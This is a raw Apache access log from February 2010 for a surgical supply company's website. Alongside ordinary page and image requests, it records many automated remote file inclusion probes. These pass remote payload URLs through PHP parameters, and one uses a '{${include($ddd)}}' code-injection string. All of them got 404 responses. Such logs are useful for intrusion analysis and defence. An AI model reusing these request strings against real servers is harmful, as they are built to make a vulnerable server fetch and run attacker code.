74.208.14.52 - - [23/Feb/2010:02:17:31 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
74.208.14.52 - - [23/Feb/2010:02:17:31 -0500] "GET /logs/access_log.Q109101000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.208.14.52 - - [23/Feb/2010:02:17:31 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
74.208.14.52 - - [23/Feb/2010:02:17:31 -0500] "GET /logs/access_log.Q110020500//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
62.2.136.250 - - [23/Feb/2010:02:17:49 -0500] "GET /images/login_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:17:49 -0500] "GET /images/psearch_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:17:49 -0500] "GET /images/psearch_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:17:49 -0500] "GET /images/login_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.180.29.158 - - [23/Feb/2010:02:17:54 -0500] "GET /images/psearch_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30)"
203.180.29.158 - - [23/Feb/2010:02:17:54 -0500] "GET /images/login_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30)"
203.180.29.158 - - [23/Feb/2010:02:17:55 -0500] "GET /images/psearch_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30)"
203.180.29.158 - - [23/Feb/2010:02:17:55 -0500] "GET /images/login_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30)"
218.38.243.44 - - [23/Feb/2010:02:17:57 -0500] "GET /logs//main.php?sayfa=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.38.243.44 - - [23/Feb/2010:02:17:57 -0500] "GET //main.php?sayfa=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.38.243.44 - - [23/Feb/2010:02:17:57 -0500] "GET /logs/access_log.Q109121400%20%20//main.php?sayfa=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
62.2.136.250 - - [23/Feb/2010:02:17:57 -0500] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS HTTP/1.0" 200 45923 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:17:58 -0500] "GET /images/head_aceLogo.gif HTTP/1.0" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:17:58 -0500] "GET /images/head_btn-products.gif HTTP/1.0" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:17:58 -0500] "GET /images/head_btn-shop.gif HTTP/1.0" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:17:58 -0500] "GET /images/head_btn-catalogs.gif HTTP/1.0" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:17:58 -0500] "GET /images/head_btn-brochures.gif HTTP/1.0" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:17:59 -0500] "GET /images/head_btn-space1.gif HTTP/1.0" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:17:59 -0500] "GET /images/head_surgical-supply.gif HTTP/1.0" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:17:59 -0500] "GET /images/head_btn-aboutUs.gif HTTP/1.0" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:17:59 -0500] "GET /images/head_btn-tutorials.gif HTTP/1.0" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:17:59 -0500] "GET /images/head_btn-seminars.gif HTTP/1.0" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:17:59 -0500] "GET /images/head_btn-conventions.gif HTTP/1.0" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:17:59 -0500] "GET /images/head_btn-contactUs.gif HTTP/1.0" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:17:59 -0500] "GET /images/head_btn-spacer2.gif HTTP/1.0" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:17:59 -0500] "GET /images/blend.jpg HTTP/1.0" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:17:59 -0500] "GET /images/items/5096000_THUMB.JPG HTTP/1.0" 200 2069 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:18:00 -0500] "GET /favicon.ico HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:18:00 -0500] "GET /images/head_aceLogo-over.gif HTTP/1.0" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:18:00 -0500] "GET /images/head_btn-shop-over.gif HTTP/1.0" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:18:00 -0500] "GET /images/head_btn-products-over.gif HTTP/1.0" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:18:00 -0500] "GET /images/head_btn-catalog-over.gif HTTP/1.0" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:18:00 -0500] "GET /images/head_btn-brochures-over.gif HTTP/1.0" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:18:00 -0500] "GET /images/head_btn-aboutUs-over.gif HTTP/1.0" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:18:00 -0500] "GET /images/head_btn-tutorials-over.gif HTTP/1.0" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:18:00 -0500] "GET /images/head_btn-seminars-over.gif HTTP/1.0" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:18:00 -0500] "GET /images/head_btn-conventions-over.gif HTTP/1.0" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
62.2.136.250 - - [23/Feb/2010:02:18:00 -0500] "GET /images/head_btn-contactUs-over.gif HTTP/1.0" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
218.38.243.44 - - [23/Feb/2010:02:18:03 -0500] "GET /logs/access_log.Q109060100%20%20//main.php?sayfa=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
61.111.3.35 - - [23/Feb/2010:02:18:09 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
61.111.3.35 - - [23/Feb/2010:02:18:09 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
218.38.243.44 - - [23/Feb/2010:02:18:11 -0500] "GET /logs//main.php?sayfa=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.38.243.44 - - [23/Feb/2010:02:18:11 -0500] "GET //main.php?sayfa=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.38.243.44 - - [23/Feb/2010:02:18:11 -0500] "GET /logs/access_log.Q109121400%20%20//main.php?sayfa=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
61.111.3.35 - - [23/Feb/2010:02:18:13 -0500] "GET /logs/access_log.Q109092200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.38.243.44 - - [23/Feb/2010:02:18:18 -0500] "GET /logs/access_log.Q109060100%20%20//main.php?sayfa=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
206.63.65.14 - - [23/Feb/2010:02:18:27 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
206.63.65.14 - - [23/Feb/2010:02:18:27 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
206.63.65.14 - - [23/Feb/2010:02:18:27 -0500] "GET /logs/access_log.Q110020500//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
206.63.65.14 - - [23/Feb/2010:02:18:27 -0500] "GET /logs/access_log.Q109101000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:02:18:55 -0500] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
61.111.3.35 - - [23/Feb/2010:02:19:05 -0500] "GET /logs/access_log.Q109091800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:02:19:07 -0500] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:02:19:18 -0500] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
210.114.222.95 - - [23/Feb/2010:02:19:21 -0500] "GET /logs/error_log.Q109112100//akocomments.php?mosConfig_absolute_path=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
210.114.222.95 - - [23/Feb/2010:02:19:22 -0500] "GET //akocomments.php?mosConfig_absolute_path=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
210.114.222.95 - - [23/Feb/2010:02:19:22 -0500] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 219 "-" "libwww-perl/5.79"
202.125.152.246 - - [23/Feb/2010:02:19:29 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
202.125.152.246 - - [23/Feb/2010:02:19:29 -0500] "GET /logs/access_log.Q110020500//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
202.125.152.246 - - [23/Feb/2010:02:19:31 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
202.125.152.246 - - [23/Feb/2010:02:19:31 -0500] "GET /logs/access_log.Q109101000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.254.98.142 - - [23/Feb/2010:02:19:35 -0500] "GET //component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 240 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
66.254.98.142 - - [23/Feb/2010:02:19:36 -0500] "GET /logs//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 245 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
61.111.3.35 - - [23/Feb/2010:02:19:44 -0500] "GET /logs/access_log.Q109091800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
123.143.29.250 - - [23/Feb/2010:02:20:00 -0500] "GET /logs//common/db.php?commonpath=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
123.143.29.250 - - [23/Feb/2010:02:20:00 -0500] "GET /logs/access_log.Q109071100%20%20//common/db.php?commonpath=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
123.143.29.250 - - [23/Feb/2010:02:20:00 -0500] "GET //common/db.php?commonpath=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.239.124.204 - - [23/Feb/2010:02:20:20 -0500] "GET //skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
211.239.124.204 - - [23/Feb/2010:02:20:20 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.239.124.204 - - [23/Feb/2010:02:20:20 -0500] "GET /logs/access_log.Q109081600//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.239.124.204 - - [23/Feb/2010:02:20:22 -0500] "GET /logs/access_log.Q109081600//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.239.124.204 - - [23/Feb/2010:02:20:22 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.239.124.204 - - [23/Feb/2010:02:20:22 -0500] "GET //skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
211.239.124.204 - - [23/Feb/2010:02:20:27 -0500] "GET /logs/access_log.Q109072400//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.239.124.204 - - [23/Feb/2010:02:20:29 -0500] "GET /logs/access_log.Q109072400//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
123.143.29.250 - - [23/Feb/2010:02:20:38 -0500] "GET /logs/access_log.Q109062600%20%20//common/db.php?commonpath=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
209.172.33.230 - - [23/Feb/2010:02:20:51 -0500] "GET /logs/access_log.Q109102900//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
220.181.7.60 - - [23/Feb/2010:02:20:58 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
74.208.14.52 - - [23/Feb/2010:02:21:03 -0500] "GET /logs/access_log.Q109102900//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.208.14.52 - - [23/Feb/2010:02:21:03 -0500] "GET /logs/access_log.Q109052000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.254.98.142 - - [23/Feb/2010:02:21:10 -0500] "GET //component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.britishschool.it/british//dmdocuments/test.txt??? HTTP/1.1" 404 240 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
